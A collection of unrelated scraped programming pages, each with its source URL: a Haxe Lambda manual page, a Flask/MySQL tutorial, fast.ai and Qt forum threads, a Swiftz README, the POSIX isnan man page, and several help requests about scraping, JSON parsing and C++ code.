Best Solutions
Point Value: 10 (partial)
Time Limit: 2.00s
Memory Limit: 16M
Added: Dec 14, 2008
Languages Allowed:
C++03, C, C++11
The whole reason semicolons are disallowed is to make the problem somewhat challenging.
e.g. int main(int a, int b) ...
using namespace std;? oO
This won't work in Visual C++, though.
Edit: #include <list.h> is better
It's not like we even know C (or at least I don't), so you can just try to figure it out.
here
However I made the scoring curve a bit more lenient. Edit: Can't make it too easy
PS. there are 79 answers accepted?!?
https://wcipeg.com/problem/expr#comment765
Define: Lambda
Lambda is a functional-language concept within Haxe that allows you to apply a function to lists and iterators. The Lambda class is a collection of functional methods for using functional-style programming with Haxe.
It is ideally used with using Lambda (see Static Extension) and then acts as an extension to Iterable types.
On static platforms, working with the Iterable structure might be slower than performing the operations directly on known types, such as Array and List.

The Lambda class allows us to operate on an entire Iterable at once. This is often preferable to looping routines since it is less error prone and easier to read. For convenience, the Array and List classes contain some of the frequently used methods from the Lambda class.
It is helpful to look at an example. The exists function is specified as:
static function exists<A>( it : Iterable<A>, f : A -> Bool ) : Bool
Most Lambda functions are called in similar ways. The first argument for all of the Lambda functions is the Iterable on which to operate. Many also take a function as an argument.
Lambda.array, Lambda.list: Convert an Iterable to an Array or a List. Always returns a new instance.
Lambda.count: Count the number of elements. If the Iterable is an Array or a List it is faster to use its length property.
Lambda.empty: Determine if the Iterable is empty. For all Iterables it is best to use this function; it is also faster than comparing the length (or the result of Lambda.count) to zero.
Lambda.has: Determine if the specified element is in the Iterable.
Lambda.exists: Determine if a criterion is satisfied by at least one element.
Lambda.indexOf: Find the index of the specified element.
Lambda.find: Find the first element satisfying a given search function.
Lambda.foreach: Determine if every element satisfies a criterion.
Lambda.iter: Call a function for each element.
Lambda.concat: Merge two Iterables, returning a new List.
Lambda.filter: Find the elements that satisfy a criterion, returning a new List.
Lambda.map, Lambda.mapi: Apply a conversion to each element, returning a new List.
Lambda.fold: A functional fold, also known as reduce, accumulate, compress or inject.
This example demonstrates the Lambda filter and map on a set of strings:
using Lambda;

class Main {
  static function main() {
    var words = ['car', 'boat', 'cat', 'frog'];
    var isThreeLetters = function(word) return word.length == 3;
    var capitalize = function(word) return word.toUpperCase();
    // Three letter words, capitalized.
    trace(words.filter(isThreeLetters).map(capitalize)); // [CAR,CAT]
  }
}
This example demonstrates the Lambda count, has, foreach and fold function on a set of ints.
using Lambda;

class Main {
  static function main() {
    var numbers = [1, 3, 5, 6, 7, 8];
    trace(numbers.count()); // 6
    trace(numbers.has(4)); // false
    // test if all numbers are greater/smaller than 20
    trace(numbers.foreach(function(v) return v < 20)); // true
    trace(numbers.foreach(function(v) return v > 20)); // false
    // sum all the numbers
    var sum = function(num, total) return total += num;
    trace(numbers.fold(sum, 0)); // 30
  }
}
http://haxe.org/manual/std-Lambda.html
If you’re looking to build a simple web application with a nice frontend, you may think your options are limited as far as what languages to use. For a long time, when I thought about web development, Python never really sprung to mind as an ideal language to use, mostly because I thought it was reserved purely for scripting and other basic operating system-level functions.
As it happens, Python has a fantastic microframework called Flask—which is used to power some incredibly popular websites such as Pinterest, LinkedIn and the community web page for Flask. One of the things that concerned me the most when beginning to use this framework (along with Python itself for such a task) was the ability to interact with a database such as MySQL. Although there are toolkits available such as SQLAlchemy, which are very powerful indeed, I found this to be a little complex for my basic requirements and instead I set out to find an easier way to interact with MySQL. This article will show you what I discovered!
Here’s what we’re going to cover. Grab a coffee and let’s get started!
- Setting up our development environment
- Create a basic Flask application which displays a “Hello, World!” web page
- Introduce database queries to our application
- Conclusion
Setting up the development environment
There are many seasoned Python developers who will create and maintain their scripts or applications from the command line using tools like Vim (on Linux). However, if you’re fairly new to Python development, then it’s important that you understand the need for an IDE (at least when starting out). The reason for this? Python is quite particular on indentation within your code, and if you get it wrong, you’ll run into some very strange problems indeed. Using a decent IDE will provide you with tips as you go along when it detects mistakes you may have made. I’ve found this to be hugely beneficial since starting Python development, and I really encourage it.
So, which IDE should I use?!
There are many different IDEs available, including complex notepad editors that have Python syntax plugins, such as Visual Studio Code. These tend to miss out on some key features of a decent IDE, though, and as such, I would highly recommend using PyCharm, which is by far widely recognised in the community as the de facto gold standard IDE for Python development. There are community, open-source(!), and paid versions available, and in my short coding career with Python, I’ve found the community version to be more than enough for me.
So without further ado, let’s get started! For the purposes of this article, I will be using PyCharm on Windows 10 (there is a version for Linux and MacOS too, so if you’re following along, please keep an eye out for minor differences).
Let’s start by firing up PyCharm and selecting New Project from the File menu:
Set the name of the project and click Create when you’re ready to proceed.
From the same File menu, select New -> Python File, give it a name, and click OK:
Now we can populate our new file with the code to get us up and running with a basic Flask “Hello, World!” application. At this point, if you haven’t used Flask before on your system, then you’ll need to install it using pip. This can be done with one command from your terminal: pip3 install flask
from flask import Flask

app = Flask(__name__)

@app.route('/')
def hello_world():
    return 'Hello, World!'
Once you’ve pasted the above code into your IDE, you can test it out by navigating to your project folder in the terminal and running the following commands:
# set FLASK_APP=mysql-test.py (use 'export' instead of 'set' if running under Linux or MacOS)
# python -m flask run
You should see something similar to the following:
This means that a local web server is now listening on port 5000 and you should be able to browse to the URL above and see “Hello, World!” in your web browser. Let’s try it!
Great! So we now have the basis for our application up and running.
Introducing database queries to our application
Now we will want to add some database functionality. MySQL actually publishes an “employees” sample database, which allows one to test database queries and get to grips with SQL, so we’ll use that for our example. At this point, I will be restoring the database into a local MySQL instance on my Windows 10 machine. Doing this on a Linux system with MySQL installed is just as easy.
The easiest way to get this test database is simply to clone it locally using the following command:
git clone
If you are on a Linux machine or have the MySQL client installed locally on your Windows machine, go ahead and run the following commands whilst in the test_db directory:
# mysql < employees.sql
If you are running the command above in some environments, you may need to specify a username and password. This can be done with the -u and -p flags respectively.
Once we have imported the employee data, we can then update our main Python script by removing the “Hello, World!” app route and replacing it with a new one that will be the home for our database connection request. We’ll also be adding a small database class to house the database query itself.
from flask import Flask, render_template
import pymysql

app = Flask(__name__)

class Database:
    def __init__(self):
        host = "127.0.0.1"
        user = "test"
        password = "password"
        db = "employees"
        self.con = pymysql.connect(host=host, user=user, password=password,
                                   db=db, cursorclass=pymysql.cursors.DictCursor)
        self.cur = self.con.cursor()

    def list_employees(self):
        self.cur.execute("SELECT first_name, last_name, gender FROM employees LIMIT 50")
        result = self.cur.fetchall()
        return result

@app.route('/')
def employees():
    def db_query():
        db = Database()
        emps = db.list_employees()
        return emps

    res = db_query()
    return render_template('employees.html', result=res,
                           content_type='application/json')
Furthermore, we’ll add a basic HTML page with a table to illustrate our database query in action. For this, you’ll need to create a “templates” folder, as Flask requires you to have HTML templates in this structure to work. Once you have done this, your structure should look similar to the following:
The contents of the HTML page are as follows:
{% if result %}
{% for row in result %}
{% endfor %} {% endif %}
If you copy and paste the code above and run your application, you should now see something similar to the following in your browser (please note that we have limited the query output to 50 rows in order to not crash your browser!):
Conclusion
As you can see from this basic example, interacting with MySQL and presenting data on a web page using Python and Flask is actually incredibly simple. If you are fairly new to Python web development, then this is a good way to get to grips with how things work. That being said, once you start to advance and your requirements become more complex, looking at something like SQLAlchemy may be a better route to go down.
Resources
- The code for this tutorial can be found at:
- The Flask microframework:
- W3Schools HTML tables introduction:
- Jinja2 template engine documentation:
- PyMySQL (MySQL client for Python):
- More information on SQLAlchemy:
https://sweetcode.io/flask-python-3-mysql/
Hi all, I'm witnessing some funny behavior in my training val_loss and val_acc. They wobble around all over the place instead of being consistent. I've tried a few architectures on sample redux data and it seems to happen regardless of architecture. My hypothesis is that it has something to do with the data augmentation being too different from the val set; has anyone run into this before? Especially where a val_loss of 7 is sandwiched between .13 and .47?
I've taken the vggbn model and kept the last 3 conv layers and 1st dense layer trainable. Then I've popped everything after that and added my own tail.
Epoch 1/10
125/125 [==============================] - 48s - loss: 0.4372 - acc: 0.8295 - val_loss: 0.3996 - val_acc: 0.9060
Epoch 2/10
125/125 [==============================] - 40s - loss: 0.1999 - acc: 0.9220 - val_loss: 1.0032 - val_acc: 0.7903
Epoch 3/10
125/125 [==============================] - 48s - loss: 0.1715 - acc: 0.9315 - val_loss: 0.2281 - val_acc: 0.9215
Epoch 4/10
125/125 [==============================] - 47s - loss: 0.1418 - acc: 0.9440 - val_loss: 0.1141 - val_acc: 0.9690
Epoch 5/10
125/125 [==============================] - 40s - loss: 0.1407 - acc: 0.9505 - val_loss: 0.6629 - val_acc: 0.8543
Epoch 6/10
125/125 [==============================] - 40s - loss: 0.1143 - acc: 0.9595 - val_loss: 0.5840 - val_acc: 0.9194
Epoch 7/10
125/125 [==============================] - 40s - loss: 0.1154 - acc: 0.9630 - val_loss: 0.1162 - val_acc: 0.9731
Epoch 8/10
125/125 [==============================] - 40s - loss: 0.0913 - acc: 0.9675 - val_loss: 0.1349 - val_acc: 0.9628
Epoch 9/10
125/125 [==============================] - 40s - loss: 0.0978 - acc: 0.9645 - val_loss: 7.4255 - val_acc: 0.5362
Epoch 10/10
125/125 [==============================] - 40s - loss: 0.0995 - acc: 0.9625 - val_loss: 0.4757 - val_acc: 0.8988
A followup - I've tried modifying data augmentation which didn't do anything but modifying the validation shuffle=False and lowering the learning rate seems to have at least made it more consistent and better performing.
I don't think so - this paper talks about
"We also introduce a new type of ensemble composed of one or more full models and many specialist models which learn to distinguish fine-grained classes that the full models confuse. Unlike a mixture of experts, these specialist models can be trained rapidly and in parallel."
Distilling the Knowledge in a Neural Network -
Can somebody help me with this, I do not know why I'm getting this error ???
Also, does this halve the weights of the corresponding fc layers only, or all of the model's layers? I believe the model will have a lot more layers than fc_layers.
Embarrassingly enough, I was stuck on this for a bit too until I looked about 10 lines up from there, where another var called model is declared within the scope of the get_fc_model function:
def get_fc_model():
    model = Sequential([
        MaxPooling2D(input_shape=conv_layers[-1].output_shape[1:]),
        Flatten(),
        Dense(4096, activation='relu'),
It is confusing because a different variable called model is previously defined at the notebook level and holds the whole finetuned VGG model. Anyway, wanted to respond for completeness' sake, but hopefully this will save someone a bit of time too.
Hi,
In lesson 3 notebook vgg16bn is used while adding batchnorm instead of vgg16.
Why can vgg16 not be used? What is the basic difference between the two?
Thanks & Regards
I am having difficulty following the examples. The code in the video and the lesson 3 notebook do not match, and I am not sure whether to follow the lesson 3 notebook or the imagenet_batchnorm notebook. Also, if I have to follow the imagenet_batchnorm notebook, do I need to download the imagenet data as suggested under the solution section?
Do I have to download the imagenet data for the cats and dogs batch normalization, as suggested under the solution section in the imagenet_batchnorm1 notebook?
Hi! I am having difficulties fine tuning the other, deeper, Dense Layers in VGG when trying to finish the State Farm Kaggle competition. I have fine tuned the last Dense Layer and would like to train the two other fully connected layers. Did this by using directly “vgg.finetune”.
Not much of a coder as I started learning Python like a bit over a month ago, so this might be a “silly” question, but I can’t figure out what I should do.
Do I need to import something from keras.models or keras.layers to make this work?
Or do I need to replace “first_dense_idx” with the index of the first dense layer? If so, how can I find out what the index is?
Solved it myself.
You have to first define model = vgg.model and then layers = model.layers:
model = vgg.model
layers = model.layers
And you get the index of layers by typing the following:
for i, layer in enumerate(model.layers):
print(i, layer.name)
And then you can define which layers to set to trainable.
for example:
for layer in model.layers[33:]:
layer.trainable = True
Hi @rachel,
I was referring to the MNIST notebook, which provides an end-to-end model for doing regularization.
In creating a model with a single hidden layer, Jeremy uses an activation layer = ‘softmax’. The snapshot is shown below:
May I know why a softmax layer should be used in an intermediate layer? My understanding is that it should be used only in the last layer…
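To clarify the intuition behind that question: softmax turns raw scores into a probability distribution (non-negative values summing to 1), which is why it normally appears only at the output layer; applied mid-network it would squash the information later layers need. A tiny standalone sketch in plain Python (no Keras required; the function name here is mine):

```python
import math

def softmax(scores):
    """Convert raw scores into a probability distribution."""
    m = max(scores)                       # subtract max for numerical stability
    exps = [math.exp(s - m) for s in scores]
    total = sum(exps)
    return [e / total for e in exps]

probs = softmax([2.0, 1.0, 0.1])
print(round(sum(probs), 6))  # 1.0 -- softmax outputs always sum to one
```

Because every output is forced into [0, 1] and the whole vector sums to 1, the layer is really a "pick a class" operation, which is only meaningful at the end of the network.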
Source: http://forums.fast.ai/t/lesson-3-discussion/186?page=10
I'm trying to get products for a project I'm working on from this page: lazada
(page inspection)
using:
from bs4 import BeautifulSoup
import urllib
import re
r = urllib.urlopen("").read()
soup = BeautifulSoup(r,"lxml")
letters = soup.findAll("span",class_=re.compile("product-card__name"))
print type(letters)
print letters[0]
Traceback (most recent call last):
File "C:/Python27/project/testaja.py", line 9, in
print letters[0]
IndexError: list index out of range
I think you may have hit their page too much; navigate there in a browser and see what the page returns on your network.
Also, you can modify your code so you can check the page response header to make sure that the page returned properly before trying to scrape it. I modified your code to show an example of this below:
from bs4 import BeautifulSoup
import urllib
import re

r = urllib.urlopen("")
header_code = r.getcode()
if header_code == 200:
    html = r.read()
    soup = BeautifulSoup(html, "lxml")
    letters = soup.findAll("span", {"class": re.compile("product-card__name")})
    for letter in letters:
        print letter
else:
    print("oops, something went wonky. Page response was: %s" % header_code)
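More generally, a scraper that may be rate-limited can back off and retry on non-200 responses. A minimal sketch of that pattern (the fetch parameter is a stand-in for a real urllib call, so the logic runs without touching the network):

```python
import time

def fetch_with_retry(fetch, url, retries=3, delay=0.01):
    """Call fetch(url) until it reports status 200, backing off between tries.

    Returns the (status, body) pair from the last attempt."""
    for attempt in range(retries):
        status, body = fetch(url)
        if status == 200:
            return status, body
        time.sleep(delay * (2 ** attempt))  # exponential backoff
    return status, body

# Stand-in fetcher: fails twice, then succeeds.
calls = []
def fake_fetch(url):
    calls.append(url)
    return (200, "<html/>") if len(calls) >= 3 else (503, "")

status, body = fetch_with_retry(fake_fetch, "http://example.com")
print(status, len(calls))  # 200 3
```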
Source: https://codedump.io/share/8LNHQqhZp4nt/1/python-beautifulsoup-can39t-read-div-tag
On Dec 7, 2006, at 2:51 AM, Ard Schrijvers wrote:
> 1) The lightweight StripNameSpaceTransformer is an option to strip
> intermediate namespaces you want to get rid of (like after sql
> transformer, I would like to get rid of them as fast as possible). Add
> this to trunk/branch or not?
+1
> 2) The XHTML serializer: Make it by default strip the list of
> namespaces we know people don't want to sent to the browser.
> Configurable: added namespaces to be stripped.
-1. IMO (a) the serializers are not the place to do anything w/
namespaces, and (b) in particular w/ XHTML you have no idea what
namespaces I want or don't want sent to the browser, (c) you said "by
default" which implies some way of overriding the default, i.e. another
configuration detail to document, and (d) if we're adding a transformer
to do this already (see above), then it's kind of moot :-)
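For readers following along outside Cocoon, the kind of namespace stripping under discussion can be sketched generically. Here is a minimal, hypothetical illustration using Python's xml.etree.ElementTree (not Cocoon's StripNameSpaceTransformer API; it strips element namespaces only and leaves attribute namespaces untouched):

```python
import xml.etree.ElementTree as ET

def strip_namespaces(xml_text):
    """Remove the namespace prefix from every element tag."""
    root = ET.fromstring(xml_text)
    for el in root.iter():
        # ElementTree stores namespaced tags as '{uri}local'
        if '}' in el.tag:
            el.tag = el.tag.split('}', 1)[1]
    return ET.tostring(root, encoding='unicode')

doc = '<a xmlns="http://example.com/ns"><b>x</b></a>'
print(strip_namespaces(doc))  # <a><b>x</b></a>
```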
> About serializers: Does anybody know why we have a serialization part
> in cocoon core and one in a serializers block? Is it preferred to use
> serializers from the serializers block?
Good question, I'd like to know as well...
Cheers,
—ml—
Source: http://mail-archives.apache.org/mod_mbox/cocoon-dev/200612.mbox/%3C331040e7c58b7c35f71a75e07e6a6343@wrinkledog.com%3E
Swiftz is a Swift library for functional programming.
It defines functional data structures, functions, idioms, and extensions that augment
the Swift standard library.
For a small, simpler way to introduce functional primitives into any codebase,
see Swiftx.
Introduction
Swiftz draws inspiration from a number of functional libraries
and languages. Chief among them are Scalaz,
Prelude/Base, SML
Basis, and the OCaml Standard
Library. Elements of
the library rely on their combinatorial semantics to allow declarative ideas to
be expressed more clearly in Swift.
Swiftz is a proper superset of Swiftx that
implements higher-level data types like Arrows, Lists, HLists, and a number of
typeclasses integral to programming with the maximum amount of support from the
type system.
To illustrate use of these abstractions, take these few examples:
Lists
import struct Swiftz.List

//: Cycles a finite list of numbers into an infinite list.
let finite : List<UInt> = [1, 2, 3, 4, 5]
let infiniteCycle = finite.cycle()

//: Lists also support the standard map, filter, and reduce operators.
let l : List<Int> = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
let twoToEleven = l.map(+1) // [2, 3, 4, 5, 6, 7, 8, 9, 10, 11]
let even = l.filter((==0) • (%2)) // [2, 4, 6, 8, 10]
let sum = l.reduce(curry(+), initial: 0) // 55

//: Plus a few more.
let partialSums = l.scanl(curry(+), initial: 0) // [0, 1, 3, 6, 10, 15, 21, 28, 36, 45, 55]
let firstHalf = l.take(5) // [1, 2, 3, 4, 5]
let lastHalf = l.drop(5) // [6, 7, 8, 9, 10]
Semigroups and Monoids

import protocol Swiftz.Monoid
import func Swiftz.mconcat
import struct Swiftz.Sum

//: A sample list to fold over; note the 0, which makes the product below 0.
let xs : [Int8] = [1, 2, 0, 3, 4]

//: Or the sum of a list with the Sum Monoid.
let sum = mconcat(xs.map { Sum($0) }).value() // 10

import struct Swiftz.Product

//: Or the product of a list with the Product Monoid.
let product = mconcat(xs.map { Product($0) }).value() // 0
Arrows
import struct Swiftz.Function
import struct Swiftz.Either

//: An Arrow is a function just like any other. Only this time around we
//: can treat them like a full algebraic structure and introduce a number
//: of operators to augment them.
let comp = Function.arr(+3) • Function.arr(*6) • Function.arr(/2)
let both = comp.apply(10) // 33

//: An Arrow that runs both operations on its input and combines both
//: results into a tuple.
let add5AndMultiply2 = Function.arr(+5) &&& Function.arr(*2)
let both = add5AndMultiply2.apply(10) // (15, 20)

//: Produces an Arrow that chooses a particular function to apply
//: when presented with the side of an Either.
let divideLeftMultiplyRight = Function.arr(/2) ||| Function.arr(*2)
let left = divideLeftMultiplyRight.apply(.Left(4)) // 2
let right = divideLeftMultiplyRight.apply(.Right(7)) // 14
Operators
See Operators for a list of supported operators.
Setup
To add Swiftz to your application:
Using Carthage
- Add Swiftz to your Cartfile
- Run
carthage update
- Drag the relevant copy of Swiftz into your project.
- Expand the Link Binary With Libraries phase
- Click the + and add Swiftz
- Click the + at the top left corner to add a Copy Files build phase
- Set the directory to Frameworks
- Click the + and add Swiftz
Using Git Submodules
- Clone Swiftz as a submodule into the directory of your choice
- Run
git submodule update --init --recursive
- Drag Swiftz.xcodeproj or Swiftz-iOS.xcodeproj into your project tree as a subproject
- Under your project’s Build Phases, expand Target Dependencies
- Click the + and add Swiftz
- Expand the Link Binary With Libraries phase
- Click the + and add Swiftz
- Click the + at the top left corner to add a Copy Files build phase
- Set the directory to Frameworks
- Click the + and add Swiftz
Using Swift Package Manager
- Add Swiftz to your Package.swift within your project’s Package definition:
let package = Package(
    name: "MyProject",
    ...
    dependencies: [
        .package(url: "", from: "0.0.0")
        ...
    ],
    targets: [
        .target(
            name: "MyProject",
            dependencies: ["Swiftz"]),
        ...
    ]
)
System Requirements
Swiftz supports OS X 10.9+ and iOS 8.0+.
License
Swiftz is released under the BSD license.
Latest podspec
{
  "name": "Swiftz",
  "version": "0.8.0",
  "summary": "Swiftz is a Swift library for functional programming.",
  "homepage": "",
  "license": {
    "type": "BSD"
  },
  "authors": {
    "CodaFi": "[email protected]",
    "pthariensflame": "[email protected]"
  },
  "requires_arc": true,
  "platforms": {
    "osx": "10.9",
    "ios": "8.0",
    "tvos": "9.1",
    "watchos": "2.1"
  },
  "source": {
    "git": "",
    "tag": "0.8.0",
    "submodules": true
  },
  "source_files": [
    "Sources/Swiftz/*.swift",
    "Carthage/Checkouts/Swiftx/Sources/Swiftx/*.swift",
    "Carthage/Checkouts/Operadics/Sources/Operadics/Operators.swift"
  ]
}
Mon, 08 Apr 2019 10:56:10 +0000
Source: https://tryexcept.com/articles/cocoapod/swiftz
When I started the project I went with GSON, as it seemed the most complete and had good backing.
I feel now that it is not performing very well. For example, when I load an array of 200 items (objects) from a web service, it takes about 5 seconds to parse it into an object array on my Nexus S. On the emulator it is even more pronounced; in this case I like the emulator's slowness, as it exposes all these bad spots very well.
Now that my app is pretty much solid, I'm looking into different ways to do what I need to do, and maybe save on install size. I had to bake GSON into my app with a custom namespace because of HTC issues.
Source: https://codedump.io/share/7e6MJ76cIxn2/1/light-and-fast-android-json-parser
I have written the following code. The problem is that when I run it (F9), I don't see my output, nor do I see any error in the program. Any idea why? Thanks in advance.
empId: an array of seven long integers to hold employee identification numbers.
hours: an array of seven integers to hold the number of hours worked
by each employee
payRate: an array of seven floats to hold each employee's hourly pay rate
wages: an array of seven floats.
#include <cstdlib>
#include <iostream>
#include <iomanip>
using namespace std;

int main(int argc, char *argv[])
{
    const int size = 7;
    long empID[size] = {5658845, 4520125, 7895122, 8777541,
                        8451277, 7302850, 7580489};
    int hours[size];
    float payRate[size];
    float wages[size];

    //Function Prototypes
    float getWages(float);
    float displayWages(float);

    cout<<"Enter the info for each of the following employees "<<endl;
    cout<<"identified by their ID numbers: "<<endl;
    getWages(1);
    displayWages(1);

//_________________________________________________________________________________________
//Input hours worked
float getWages(float size, int hours, float payRate, float empID);
{
    for (int index = 0; index < size; index++)
    {
        cout<<" "<<endl;
        cout<<"Employee number: "<<empID[index]<<endl;
        cout<<"Number of hours worked: ";
        cin>>hours[index];
        //eliminate negative numbers
        while (hours[index] < 0)
        {
            cout<<"Employee can not work negative hours"<<endl;
            cout<<"Number of hours worked: ";
            cin>>hours[index];
        }
        cout<<"Pay Rate: ";
        cin>>payRate[index];
    }
}

//____________________________________________________________________________
//Display the hours worked and the employees number
float displayWages(float wages, float size, int hours, float Payrate, float empID);

cout<<"\n\n"<<endl;
cout<<"Employee Number      Wages "<<endl;
cout<<"__________________________________"<<endl;
cout<< fixed << showpoint << setprecision(2);
for (int index = 0; index <size; index++)
{
    double wages = hours[index] * payRate[index];
    cout<<"   "<<empID[index]<<"       $  "<<wages<<endl;
}

cin.ignore(-1u); // clears EVERYTHING out of cin
cin.clear();     // resets cin so the next line will work
cin.get();       // wait for a character to be pressed
// system("PAUSE");
// return EXIT_SUCCESS;
}
Source: https://www.daniweb.com/programming/software-development/threads/94175/help-plz
IEEE/The Open Group
2013
PROLOG
This manual page is part of the POSIX Programmer’s Manual. The Linux implementation of this interface may differ (consult the corresponding Linux manual page for details of Linux behavior), or the interface may not be implemented on Linux.
NAME
isnan — test for a NaN
SYNOPSIS
#include <math.h>
int isnan(real-floating x);
DESCRIPTION
The functionality described on this reference page is aligned with the ISO C standard. Any conflict between the requirements described here and the ISO C standard is unintentional. This volume of POSIX.1-2008 defers to the ISO C standard.
The isnan() macro shall determine whether its argument value is a NaN. First, an argument represented in a format wider than its semantic type is converted to its semantic type. Then determination is based on the type of the argument.
RETURN VALUE
The isnan() macro shall return a non-zero value if and only if its argument has a NaN value.
ERRORS
No errors are defined.
The following sections are informative.
EXAMPLES
None.
APPLICATION USAGE
None.
RATIONALE
None.
FUTURE DIRECTIONS
None.
SEE ALSO
fpclassify(), isfinite(), isinf(), isnormal(), signbit() .
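As a quick illustration of the behavior specified above, sketched here in Python, whose math.isnan follows the same IEEE 754 semantics as this C macro:

```python
import math

nan = float("nan")

print(math.isnan(nan))           # True
print(math.isnan(1.0))           # False
print(math.isnan(float("inf")))  # False -- infinity is not a NaN

# NaN is the only floating-point value that compares unequal to itself,
# which is essentially the property isnan() detects.
print(nan != nan)                # True
```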
Source: https://reposcope.com/man/en/3p/isnan
"Undefined symbols for arch. i386" when including C++ library in iOS simulator build
Hi all,
I have been struggling for a long time to include the simplest C++ library in a Qt Quick iOS application. I'm able to include C++ code directly in the project, but not from a lib. Any help would be highly appreciated. I use Qt for iOS and Android 5.5.0, Qt creator 3.4.2 and Xcode 6.4.
- First I start a new project and choose the C++ library template. I have tried to choose both shared and static library.
This is my header file with an empty constructor.
#ifndef TESTLIB_STATIC_H
#define TESTLIB_STATIC_H

class Testlib_static
{
public:
    Testlib_static();
    void void_testBeskjed();
};

#endif // TESTLIB_STATIC_H
And this is the .pro file:
#-------------------------------------------------
#
# Project created by QtCreator 2015-10-01T11:14:00
#
#-------------------------------------------------

QT -= gui

TARGET = testlib_static
TEMPLATE = lib
CONFIG += staticlib

SOURCES += testlib_static.cpp
HEADERS += testlib_static.h

unix {
    target.path = /usr/lib
    INSTALLS += target
}

QMAKE_IOS_DEPLOYMENT_TARGET = 8.4
I build this library with the iphonesimulator-clang toolkit. I have Xcode 6.4 installed. Then I run lipo to check the file:
$lipo -info libtestlib_static.a
Architectures in the fat file: libtestlib_static.a are: i386 x86_64
Then I start a new project and choose the Qt Quick Application.
I right click the project and select add external library and select the libtestlib_static.a which I have built. It says it will be linked statically, both when I have tried to create a shared and static library in point 1 above.
- I create a Testlib_static object in the Qt Quick application, but get the compile/link error described in the beginning.
#include <QApplication>
#include <QQmlApplicationEngine>
#include <testlib_static.h>

int main(int argc, char *argv[])
{
    Testlib_static lib;
    QApplication app(argc, argv);
    QQmlApplicationEngine engine;
    engine.load(QUrl(QStringLiteral("qrc:/main.qml")));
    return app.exec();
}
Here is the .pro file of my project:
TEMPLATE = app

QT += qml quick widgets

SOURCES += main.cpp

RESOURCES += qml.qrc

QMAKE_IOS_DEPLOYMENT_TARGET = 8.4

# Additional import path used to resolve QML modules in Qt Creator's code model
QML_IMPORT_PATH =

# Default rules for deployment.
include(deployment.pri)

macx: LIBS += -L$$PWD/../testlib_static/build-testlib_static-iphonesimulator_clang_Qt_5_5_0_ios-Debug/ -ltestlib_static

INCLUDEPATH += $$PWD/../testlib_static/testlib_static
DEPENDPATH += $$PWD/../testlib_static/testlib_static

macx: PRE_TARGETDEPS += $$PWD/../testlib_static/build-testlib_static-iphonesimulator_clang_Qt_5_5_0_ios-Debug/libtestlib_static.a
- Here is the error message. I can not figure out why the i386 is missing:
Undefined symbols for architecture i386:
  "Testlib_static::Testlib_static()", referenced from:
      _qtmn in main.o
ld: symbol(s) not found for architecture i386
clang: error: linker command failed with exit code 1 (use -v to see invocation)
** BUILD FAILED **
The following build commands failed:
    Ld Debug-iphonesimulator/qtQuick_testJon.app/qtQuick_testJon normal i386
(1 failure)
make[1]: *** [iphonesimulator-debug] Error 65
make: *** [debug-iphonesimulator] Error 2
11:05:27: The process "/usr/bin/make" exited with code 2.
Error while building/deploying project qtQuick_testJon (kit: iphonesimulator-clang Qt 5.5.0 (ios))
When executing step "Make"
11:05:27: Elapsed time: 00:03.
So I finally found a part in the documentation saying:
PRE_TARGETDEPS
Lists libraries that the target depends on. Some backends, such as the generators for Visual Studio and Xcode project files, do not support this variable. Generally, this variable is supported internally by these build tools, and it is useful for explicitly listing dependent static libraries.
Apparently I have to include the lib manually in the .xcodeproj file. That worked, but isn't Add Library... supposed to add the necessary commands to the .pro file?
Source: https://forum.qt.io/topic/59762/undefined-symbols-for-arch-i386-when-including-c-library-in-ios-simulator-build